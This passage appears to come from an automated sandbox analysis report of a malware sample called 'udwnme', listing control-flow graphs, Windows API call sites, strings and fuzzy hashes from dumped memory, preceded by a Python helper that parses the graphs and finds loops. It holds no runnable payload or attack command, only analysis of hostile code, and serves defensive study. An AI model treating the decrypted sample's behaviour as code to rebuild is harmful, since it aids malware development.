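    "23991 5400a6a 23933->23991 23934->23914 "
    "23988 5400a7d 23987->23988 23989 5400a82 KiUserExceptionDispatcher 23988->23989 "
    "23990 5400a95 23988->23990 23989->23988 23990->23934 "
    "23992 5400a7d 23991->23992 23993 5400a95 23992->23993 "
    "23994 5400a82 KiUserExceptionDispatcher 23992->23994 23993->23934 23994->23992"
)
# Constructed sample: the control_flow_graph listing above, copied as printed.
CONTROL_FLOW_GRAPH = (
    "851 5400b20-5400b75 LdrInitializeThunk 855 5400b7c-5400b83 851->855 "
    "856 5400b85-5400bb9 855->856 857 5400bcb-5400be4 855->857 856->857 "
    "866 5400bbb-5400bc5 856->866 859 5400be6 857->859 860 5400bef 857->860 "
    "859->860 862 5400bf0 860->862 862->862 866->857"
)

def parse_graph(text):
    """Tokens are 'id addr [label words]' nodes or 'a->b' edges. Assumption: a node id is an
    all-digit token directly followed by an address-looking token, so '2 API calls' stays a label."""
    tokens, nodes, edges, current, i = text.split(), {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((edge.group(1), edge.group(2)))
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            current = tok
            nodes[current] = {"addr": tokens[i + 1], "label": ""}
            i += 2
        else:
            if current is not None:            # label word of the node being read
                nodes[current]["label"] = (nodes[current]["label"] + " " + tok).strip()
            i += 1
    if any(s not in nodes or d not in nodes for s, d in edges):
        raise ValueError("edge references an undefined node")
    return nodes, edges

def api_name(node):
    # API named by the label; 'N API calls' summary nodes and unlabeled nodes give None.
    label = node["label"]
    return None if not label or label.endswith("API calls") else label

def summarize_entries(nodes, edges):
    """For each entry node (in-degree 0): reachable node count and API call sites by name."""
    succ, indeg = defaultdict(list), {n: 0 for n in nodes}
    for src, dst in edges:
        succ[src].append(dst)
        indeg[dst] += 1
    report = {}
    for root in (n for n in nodes if indeg[n] == 0):
        seen, queue, apis = {root}, deque([root]), defaultdict(int)
        while queue:                            # BFS; 'seen' makes the cycles terminate
            n = queue.popleft()
            if (name := api_name(nodes[n])):
                apis[name] += 1
            for m in succ[n]:
                if m not in seen:
                    seen.add(m)
                    queue.append(m)
        report[nodes[root]["addr"]] = {"nodes": len(seen), "apis": dict(apis)}
    return report

def find_back_edges(nodes, edges):
    """Edges that close a cycle under a DFS in listing order; self loops such as 862->862 count."""
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    color, back = {}, set()                     # absent = unvisited, 1 = on DFS stack, 2 = done
    def visit(n):
        color[n] = 1
        for m in succ[n]:
            if color.get(m) == 1:
                back.add((n, m))
            elif m not in color:
                visit(m)
        color[n] = 2
    for n in nodes:
        if n not in color:
            visit(n)
    return back

if __name__ == "__main__":
    for text in (EXECUTION_GRAPH_EXCERPT, CONTROL_FLOW_GRAPH):
        nodes, edges = parse_graph(text)
        print(summarize_entries(nodes, edges), sorted(find_back_edges(nodes, edges)))
```

On the excerpt, the entry at 1470888 (the udwnme region dumped at 01470000) reaches KiUserExceptionDispatcher at two call sites and nothing else, while the two small entries at 5400b20 and 5405320 reach LdrInitializeThunk and KiUserCallbackDispatcher respectively; the back edges are exactly the two dispatcher loops. Run against the full listing, the same summary tells you at a glance which entry points of the decrypted code touch which APIs, without reading the node list by hand.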
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \VZl
                                                                    • API String ID: 0-3439240617
                                                                    • Opcode ID: 41f51b6c14d45e95006fb51413ab335ccbbfb3b2cb75f9fc9f9177e18fc8c179
                                                                    • Instruction ID: 6ae2d6644017d87204ade541992c6d184f45d59a51c82edc28e420b1a7136a39
                                                                    • Opcode Fuzzy Hash: 41f51b6c14d45e95006fb51413ab335ccbbfb3b2cb75f9fc9f9177e18fc8c179
                                                                    • Instruction Fuzzy Hash: 3DB11F70E002098FDB14CFA9D9857EEBBF2AF88714F14852AD415AF364EB749846CF91
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 64103321aa2bd3784126d3475e2913bff7ee98b487bb302ab942c0d2e6db977b
                                                                    • Instruction ID: 16f246151a457b90fd7062053a7b429f95301da8ffb56c67f37ab4d39f7476b5
                                                                    • Opcode Fuzzy Hash: 64103321aa2bd3784126d3475e2913bff7ee98b487bb302ab942c0d2e6db977b
                                                                    • Instruction Fuzzy Hash: FCB14E70E006098FEB14CFA9D9857EEBBF3AF88314F15852AD419A7364EB749845CB81

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 14715b8-14715d8 1 14715e6 0->1 2 14715da-14715e4 0->2 3 14715eb-14715ed 1->3 2->3 5 14715f3-147163c 3->5 6 14716d8-1471715 3->6 17 147163e-1471642 5->17 18 1471648-147168f 5->18 15 1471717-1471732 6->15 16 1471755-147177f 6->16 98 1471734 call 14716d7 15->98 99 1471734 call 14713f0 15->99 100 1471734 call 1471380 15->100 101 1471734 call 1471750 15->101 102 1471734 call 14715a8 15->102 103 1471734 call 14715b8 15->103 19 1471785-14717f7 call 1470af8 16->19 20 1471a2a-1471a8b 16->20 17->18 38 1471695-14716b9 18->38 68 14717fd-1471874 19->68 40 1471ab6-1471abf 20->40 32 147173a-147174a 52 14716c4 38->52 53 14716bb 38->53 41 1471ac1-1471ac7 40->41 42 1471a8d-1471a96 40->42 45 1471aca-1471adc 42->45 46 1471a98-1471aa6 42->46 55 1471ade-1471b14 call 1470b34 45->55 56 1471b5c-1471b5d 45->56 46->45 48 1471aa8-1471aac 46->48 49 1471ab3 48->49 50 1471aae-1471ab0 48->50 49->40 50->49 60 14716c5 52->60 53->52 59 1471b18-1471b26 55->59 58 1471b5e-1471baf call 1471bd0 56->58 56->59 87 1471bb5-1471bcd 58->87 67 1471b2c-1471b54 59->67 60->60 67->56 90 1471876-1471889 68->90 91 147188b-14718af 68->91 92 14718b6-14718ba 90->92 91->92 93 14718c5 92->93 94 14718bc 92->94 93->20 94->93 98->32 99->32 100->32 101->32 102->32 103->32
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (jq$Hjq$Tefq$dLlq$dp
                                                                    • API String ID: 0-3768792601
                                                                    • Opcode ID: 07391ef05b5b1e6a2ee8fc0e61ed68970abb74baa7be2737c2573db1801eadd9
                                                                    • Instruction ID: 201f6679a2541b71bf163b3eba7b5b8f1e8a9785b6b47358fea180516f5614d9
                                                                    • Opcode Fuzzy Hash: 07391ef05b5b1e6a2ee8fc0e61ed68970abb74baa7be2737c2573db1801eadd9
                                                                    • Instruction Fuzzy Hash: 0AE18170B002059FCB18DF79C454AAEBBF6FF89700F2485AAD506DB3A5CA749C06CB91

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 105 5405311-5405318 106 5405388 105->106 107 540531a-540537f 105->107 109 5405389-54053b7 KiUserCallbackDispatcher 106->109 107->106 111 54053c0-54053e6 109->111 112 54053b9-54053bf 109->112 112->111
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(00000050), ref: 054053A3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2931798292.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_5400000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID: 4'fq
                                                                    • API String ID: 2492992576-2007657732
                                                                    • Opcode ID: 682ba5a08a2dc03d645cb0a432b84bf607b03209f994028e71d1159a1d9ace71
                                                                    • Instruction ID: 62bb58ba628b13e1f5d4a8729df710900d363a970f322ae5b062739f0a6988e0
                                                                    • Opcode Fuzzy Hash: 682ba5a08a2dc03d645cb0a432b84bf607b03209f994028e71d1159a1d9ace71
                                                                    • Instruction Fuzzy Hash: D7218DB1804399CFCB14CFA9E4446EEBFB4FB08320F24845AD455B7291C7746944CFA5

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 117 5405320-54053b7 KiUserCallbackDispatcher 123 54053c0-54053e6 117->123 124 54053b9-54053bf 117->124 124->123
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(00000050), ref: 054053A3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2931798292.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_5400000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID: 4'fq
                                                                    • API String ID: 2492992576-2007657732
                                                                    • Opcode ID: f01cd772bbe59a217a2ffdd9334eeed0e2f550eb39baedbb4c4ce8f359e6be18
                                                                    • Instruction ID: 6c65191755efc0d977de81be79ca0948e0596f5f0302e7a4e82224d1c4d1dd49
                                                                    • Opcode Fuzzy Hash: f01cd772bbe59a217a2ffdd9334eeed0e2f550eb39baedbb4c4ce8f359e6be18
                                                                    • Instruction Fuzzy Hash: B82134B180425ACFCB14CF99E944AEEBBB5FB08320F20845AD419B3390C7796945CFA5

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 127 1476da0-1476db6 128 1476ef4-1476f19 127->128 129 1476dbc-1476dbe 127->129 131 1476f20-1476f6b 128->131 130 1476dc4-1476dd2 129->130 129->131 136 1476e05-1476e13 130->136 137 1476dd4-1476ddc 130->137 152 1476fcd-1476fd2 131->152 153 1476f6d-1476f76 131->153 144 1476e15-1476e1d 136->144 145 1476e5a-1476e68 136->145 138 1476dde-1476de0 137->138 139 1476dea-1476e02 137->139 138->139 147 1476e1f-1476e21 144->147 148 1476e2b-1476e57 144->148 154 1476eaf-1476eb7 145->154 155 1476e6a-1476e72 145->155 147->148 157 1476fc3-1476fc7 153->157 158 1476f78-1476f7b 153->158 159 1476ec5-1476ef1 154->159 160 1476eb9-1476ebb 154->160 161 1476e74-1476e76 155->161 162 1476e80-1476eac 155->162 157->152 164 1476fd3-147701d 158->164 165 1476f7d-1476f8a 158->165 160->159 161->162 166 1476f8c-1476f98 165->166 167 1476f9a-1476fa2 165->167 166->167 178 1476fb8-1476fc1 166->178 174 1476fa7-1476fb7 167->174 178->157 178->158
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (jq$(jq
                                                                    • API String ID: 0-2294966697
                                                                    • Opcode ID: dae022321ef00a0e80d3215e18d1d386e40f1b4368735f5f704336fd97b17f09
                                                                    • Instruction ID: e181fdd9ca3437874386ee5fc69036056d3e9935ff7d9a90e85718def5a9ddd7
                                                                    • Opcode Fuzzy Hash: dae022321ef00a0e80d3215e18d1d386e40f1b4368735f5f704336fd97b17f09
                                                                    • Instruction Fuzzy Hash: F571CC713046018FDB19DF2DD89096FBBE6EFC421071585ABE909CB39ADE30EC4687A1

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 282 1476108-1476194 285 1476196-14761a1 282->285 286 14761de-14761e0 282->286 285->286 288 14761a3-14761af 285->288 287 14761e2-14761fa 286->287 295 1476244-1476246 287->295 296 14761fc-1476207 287->296 289 14761d2-14761dc 288->289 290 14761b1-14761bb 288->290 289->287 291 14761bf-14761ce 290->291 292 14761bd 290->292 291->291 294 14761d0 291->294 292->291 294->289 297 1476248-14762a1 295->297 296->295 298 1476209-1476215 296->298 307 14762a3-14762a9 297->307 308 14762aa-14762ca 297->308 299 1476217-1476221 298->299 300 1476238-1476242 298->300 302 1476225-1476234 299->302 303 1476223 299->303 300->297 302->302 304 1476236 302->304 303->302 304->300 307->308 312 14762d4-1476307 308->312 315 1476317-147631b 312->315 316 1476309-147630d 312->316 318 147631d-1476321 315->318 319 147632b-147632f 315->319 316->315 317 147630f-1476312 call 1470c34 316->317 317->315 318->319 321 1476323-1476326 call 1470c34 318->321 322 1476331-1476335 319->322 323 147633f-1476343 319->323 321->319 322->323 327 1476337 322->327 324 1476345-1476349 323->324 325 1476353 323->325 324->325 328 147634b 324->328 329 1476354 325->329 327->323 328->325 329->329
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \VZl$\VZl
                                                                    • API String ID: 0-3226392100
                                                                    • Opcode ID: 0862042bc4e31dc9c89f3e5a4d336292d26c12c32b7b61f538f7ad6f252d5774
                                                                    • Instruction ID: fbd9a2a6577cd8dc36ce3bf4291df5ee9efb2f2adb5db3b2df8af8feb91cad88
                                                                    • Opcode Fuzzy Hash: 0862042bc4e31dc9c89f3e5a4d336292d26c12c32b7b61f538f7ad6f252d5774
                                                                    • Instruction Fuzzy Hash: 40715CB0E00609CFEF14DFA9D9457DEBBF2AF88314F15802AD415A7364DB749842CB91

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 234 14760fc-1476194 237 1476196-14761a1 234->237 238 14761de-14761e0 234->238 237->238 240 14761a3-14761af 237->240 239 14761e2-14761fa 238->239 247 1476244-1476246 239->247 248 14761fc-1476207 239->248 241 14761d2-14761dc 240->241 242 14761b1-14761bb 240->242 241->239 243 14761bf-14761ce 242->243 244 14761bd 242->244 243->243 246 14761d0 243->246 244->243 246->241 249 1476248-147625a 247->249 248->247 250 1476209-1476215 248->250 257 1476261-147628d 249->257 251 1476217-1476221 250->251 252 1476238-1476242 250->252 254 1476225-1476234 251->254 255 1476223 251->255 252->249 254->254 256 1476236 254->256 255->254 256->252 258 1476293-14762a1 257->258 259 14762a3-14762a9 258->259 260 14762aa-14762b8 258->260 259->260 263 14762c0-14762ca 260->263 264 14762d4-1476307 263->264 267 1476317-147631b 264->267 268 1476309-147630d 264->268 270 147631d-1476321 267->270 271 147632b-147632f 267->271 268->267 269 147630f-1476312 call 1470c34 268->269 269->267 270->271 273 1476323-1476326 call 1470c34 270->273 274 1476331-1476335 271->274 275 147633f-1476343 271->275 273->271 274->275 279 1476337 274->279 276 1476345-1476349 275->276 277 1476353 275->277 276->277 280 147634b 276->280 281 1476354 277->281 279->275 280->277 281->281
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \VZl$\VZl
                                                                    • API String ID: 0-3226392100
                                                                    • Opcode ID: c68edf534f263bda744d8b4598d7f2bab4a5a91b40f7de1e221c19333d33c285
                                                                    • Instruction ID: e99d356219af1513d5dd81eaac72dddb3731f4b49b2d11c7dfe32cff15cf8bab
                                                                    • Opcode Fuzzy Hash: c68edf534f263bda744d8b4598d7f2bab4a5a91b40f7de1e221c19333d33c285
                                                                    • Instruction Fuzzy Hash: 14715BB0E00609CFEB14DFA9D9857DEBBF2AF88314F15812AE415A7364DB749842CB91

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 371 1477020-14770f0 call 1470ce4 384 14770f5-147711c 371->384 385 14770f2 371->385 389 1477121-147712a 384->389 390 147711e 384->390 385->384 391 1477130-1477145 389->391 390->389 393 147714b-14771a6 call 1470b08 391->393 401 14771b1-14771b3 393->401 402 14771a8 393->402 405 14771b5-14771e1 401->405 406 1477140-1477142 401->406 403 14771af-14771b0 402->403 403->401 405->403 409 14771e3-14771e4 405->409 406->393 410 14771e6-14771e8 409->410 411 14771ef 409->411 410->411 412 14771f0 411->412 412->412
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tefq$dLlq
                                                                    • API String ID: 0-1852568965
                                                                    • Opcode ID: da5225edc9d07b6552dbcf70bc245839ffe0beee6809378790c9f4188f1a9e0d
                                                                    • Instruction ID: 9d4a1556c66abb8e2f7d31443c722f429f317e7a8124dc04ac868541ac93544f
                                                                    • Opcode Fuzzy Hash: da5225edc9d07b6552dbcf70bc245839ffe0beee6809378790c9f4188f1a9e0d
                                                                    • Instruction Fuzzy Hash: 6D51F474B102049FCB44DF69D498AAEBBF6FF89711B2540AAE506DB3B1DB71DC018B40

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 453 1471750-147175d 454 147175f-147177f 453->454 455 147179d-14717f7 453->455 456 1471785-147179a call 1470af8 454->456 457 1471a2a-1471a8b 454->457 479 14717fd-1471874 455->479 456->455 470 1471ab6-1471abf 457->470 471 1471ac1-1471ac7 470->471 472 1471a8d-1471a96 470->472 474 1471aca-1471adc 472->474 475 1471a98-1471aa6 472->475 481 1471ade-1471b14 call 1470b34 474->481 482 1471b5c-1471b5d 474->482 475->474 476 1471aa8-1471aac 475->476 477 1471ab3 476->477 478 1471aae-1471ab0 476->478 477->470 478->477 509 1471876-1471889 479->509 510 147188b-14718af 479->510 485 1471b18-1471b26 481->485 484 1471b5e-1471baf call 1471bd0 482->484 482->485 516 1471bb5-1471bcd 484->516 492 1471b2c-1471b54 485->492 492->482 511 14718b6-14718ba 509->511 510->511 513 14718c5 511->513 514 14718bc 511->514 513->457 514->513
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tefq$dp
                                                                    • API String ID: 0-253423911
                                                                    • Opcode ID: c44ad950e3c946003777729a20c5414d2d4d7bce808f988f7c017d8b00f4c9dc
                                                                    • Instruction ID: c415a909e3bf9e7f73aa1574f3493d89c1439d2d531c8826196a3b5959430aae
                                                                    • Opcode Fuzzy Hash: c44ad950e3c946003777729a20c5414d2d4d7bce808f988f7c017d8b00f4c9dc
                                                                    • Instruction Fuzzy Hash: 29410C74B101108FD7549F29D458AAEBBF6BF88B10F25809AE816DB3B5CA75DC05CB90

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 521 1478970-1478997 523 14789a1-14789cf 521->523 524 1478999-14789a0 521->524 528 14789e6-14789f3 523->528 529 14789d1-14789d4 523->529 530 14789f5-14789fe 528->530 531 1478a1f-1478a26 528->531 683 14789d8 call 14795fb 529->683 684 14789d8 call 14794eb 529->684 533 1478a27-14794e0 530->533 534 1478a00 530->534 532 14789de-14789e4 532->528 532->529 685 1478a04 call 1478940 534->685 686 1478a04 call 1478970 534->686 535 1478a0a-1478a1d 535->530 535->531 683->532 684->532 685->535 686->535
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: fkq
                                                                    • API String ID: 0-1814508662
                                                                    • Opcode ID: 13603e970c2d7732668679e918caecf536d914a1f42a31249dab7a9eeb678b66
                                                                    • Instruction ID: 30701f9341de32969c6a6798c46f9b84c8d85ecfb23276f06fde01cd365801e6
                                                                    • Opcode Fuzzy Hash: 13603e970c2d7732668679e918caecf536d914a1f42a31249dab7a9eeb678b66
                                                                    • Instruction Fuzzy Hash: F952DCB4A10209DBDB069FF4D494B9EBB72EB88300F109069EA4533795CB396CD1EB65

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 687 147cb98-147cbb9 688 147cbc7-147cbcb 687->688 689 147cbbb-147cbbf 687->689 690 147cbd1-147cbd4 688->690 691 147d22a 688->691 689->691 692 147cbc5 689->692 693 147d22f-147d234 690->693 694 147cbda-147cbe2 690->694 691->693 692->690 701 147d239-147d240 693->701 695 147cbe4-147cbe7 694->695 696 147cbf2-147cc0e call 147cab8 694->696 697 147cbed 695->697 698 147ccbc-147cce0 call 147cab8 695->698 705 147cc10-147cc26 call 147cab8 696->705 706 147cc8b-147ccb7 call 147cab8 696->706 697->701 707 147cce2-147ccf2 698->707 708 147ccfd-147cd0b 698->708 716 147cc58-147cc7d call 147cab8 705->716 717 147cc28-147cc2c 705->717 706->701 714 147ccfb 707->714 708->691 711 147cd11-147cd13 708->711 711->691 715 147cd19-147cd1b 711->715 720 147cd35-147cd47 714->720 715->691 721 147cd21-147cd2d 715->721 738 147cc85-147cc89 716->738 717->716 722 147cc2e-147cc4e call 147cab8 717->722 723 147cd59-147cd76 call 147cab8 720->723 724 147cd49 720->724 721->720 832 147cc50 call 147cb88 722->832 833 147cc50 call 147cb98 722->833 735 147cd7e-147cd8d 723->735 736 147cd78-147cd7c 723->736 724->701 729 147cd4f-147cd53 724->729 729->701 729->723 737 147cd90-147cda0 735->737 736->735 736->737 830 147cda3 call 147d2d1 737->830 831 147cda3 call 147d2e0 737->831 738->705 738->706 739 147cc56 739->738 741 147cda9-147ce22 747 147ce25-147ce4d 741->747 747->693 750 147ce53-147ce71 747->750 751 147ce73 750->751 752 147ce7a-147ce83 750->752 755 147ced5-147cee6 751->755 756 147ce75-147ce78 751->756 753 147ce85-147ceab 752->753 754 147cead-147ced3 752->754 763 147cf16-147cf1f 753->763 754->763 757 147cef4-147cef8 755->757 758 147cee8-147ceec 755->758 756->752 756->755 757->691 762 147cefe-147cf01 757->762 758->691 761 147cef2 758->761 761->762 762->693 764 147cf07-147cf0f 762->764 763->693 765 147cf25-147cf3a 763->765 764->763 765->747 766 147cf40-147cf44 765->766 767 147cf46-147cf4a 766->767 768 147cf4c-147cf50 766->768 767->768 769 147cf60-147cf64 767->769 770 147d087-147d093 768->770 771 147cf56-147cf5a 768->771 772 147cf66-147cf6a 769->772 773 147cfc5-147cfc9 769->773 770->693 774 147d099-147d0aa 770->774 771->769 771->770 772->773 775 147cf6c-147cf78 772->775 777 147d027-147d02b 773->777 778 147cfcb-147cfcf 773->778 774->693 776 147d0b0-147d0b7 774->776 775->693 780 147cf7e-147cf99 775->780 776->693 781 147d0bd-147d0c4 776->781 777->770 782 147d02d-147d031 777->782 778->777 779 147cfd1-147cfdd 778->779 779->693 783 147cfe3-147cffe 779->783 780->693 790 147cf9f-147cfa7 780->790 781->693 784 147d0ca-147d0d1 781->784 782->770 785 147d033-147d03f 782->785 783->693 792 147d004-147d00c 783->792 784->693 787 147d0d7-147d0ea call 147cab8 784->787 785->693 788 147d045-147d060 785->788 798 147d0ec-147d0f0 787->798 799 147d14a-147d14e 787->799 788->693 796 147d066-147d06e 788->796 790->693 793 147cfad-147cfc0 790->793 792->693 797 147d012-147d025 792->797 793->770 796->693 800 147d074-147d07f 796->800 797->770 798->799 804 147d0f2-147d0fe 798->804 801 147d150-147d154 799->801 802 147d1ab-147d1af 799->802 800->770 801->802 808 147d156-147d162 801->808 805 147d202-147d217 802->805 806 147d1b1-147d1b5 802->806 804->693 809 147d104-147d12c 804->809 813 147d219 805->813 814 147d228 805->814 806->805 811 147d1b7-147d1c3 806->811 808->693 812 147d168-147d190 808->812 809->693 820 147d132-147d145 809->820 811->693 817 147d1c5-147d1ed 811->817 812->693 823 147d196-147d1a9 812->823 813->723 819 147d21f-147d222 813->819 814->701 817->693 825 147d1ef-147d1fa 817->825 819->723 819->814 820->805 823->805 825->805 830->741 831->741 832->739 833->739
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: d
                                                                    • API String ID: 0-2564639436
                                                                    • Opcode ID: 88d1f882544d0ba8133a17cf6fcca567d99765d459c473c6df256f7f055e07e7
                                                                    • Instruction ID: 8e7a2f32cf34930caa2994184f76c600404356f4e57220dd419a371f73d09d66
                                                                    • Opcode Fuzzy Hash: 88d1f882544d0ba8133a17cf6fcca567d99765d459c473c6df256f7f055e07e7
                                                                    • Instruction Fuzzy Hash: 5B321770A0060ADFDB15CFA9D984BAEFBB2FF84314F14861AE41597765D730E896CB80

                                                                    Control-flow Graph

                                                                    control_flow_graph (nodes listed as "id start-end [API]", followed by the edge list "src->dst")
                                                                    834 5400b11-5400b5b
                                                                    837 5400b62-5400b75 LdrInitializeThunk
                                                                    838 5400b7c-5400b83
                                                                    839 5400b85-5400bb9
                                                                    840 5400bcb-5400be4
                                                                    849 5400bbb-5400bc5
                                                                    842 5400be6
                                                                    843 5400bef
                                                                    845 5400bf0
                                                                    834->837 837->838 838->839 838->840 839->840 839->849 840->842 840->843 842->843 843->845 845->845 849->840
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2931798292.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_5400000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 07e39ca7b9950a5a48175a9a52b70d251758ed7a8fb9dd9c90225f6db78c9d5b
                                                                    • Instruction ID: e4d343edfb40cd964e823809914b309a2ed031c284c11c7dc1f7a36205e9fe5a
                                                                    • Opcode Fuzzy Hash: 07e39ca7b9950a5a48175a9a52b70d251758ed7a8fb9dd9c90225f6db78c9d5b
                                                                    • Instruction Fuzzy Hash: C7216D317002158FCB55EF64C558BAE77F6EB89304F2045BAD406AB3A9DB798C42CB81
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: dLlq
                                                                    • API String ID: 0-46837485
                                                                    • Opcode ID: 80cd46c2089d8aacdd5a4fc9801c8bcb92a93f6e7c10e80a0472ec5947987302
                                                                    • Instruction ID: 814b50c6157907c03012f2ba3ef2c6a4b59778b9f3299b8a365a31f72224a0c6
                                                                    • Opcode Fuzzy Hash: 80cd46c2089d8aacdd5a4fc9801c8bcb92a93f6e7c10e80a0472ec5947987302
                                                                    • Instruction Fuzzy Hash: 1BB1B07180A3915FCB079B7884A46E97FB0AF47624F4D45EBC4819F1B3DA384D89C7A1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \VZl
                                                                    • API String ID: 0-3439240617
                                                                    • Opcode ID: 7f2f4dbf0856049823ed9553e03e7f5a88a7df7eacf659b1460dca283de0aeff
                                                                    • Instruction ID: 450275d109fa18a757b68644a7e0a015d6b6e92895deb1f986856339fa2012ab
                                                                    • Opcode Fuzzy Hash: 7f2f4dbf0856049823ed9553e03e7f5a88a7df7eacf659b1460dca283de0aeff
                                                                    • Instruction Fuzzy Hash: B3B11C70E002098FDB14CFA9D9857EEBBF1AF88714F14852AD415AF364EB749846CF91
                                                                    APIs
                                                                    • KiUserExceptionDispatcher.NTDLL ref: 05400A89
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2931798292.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
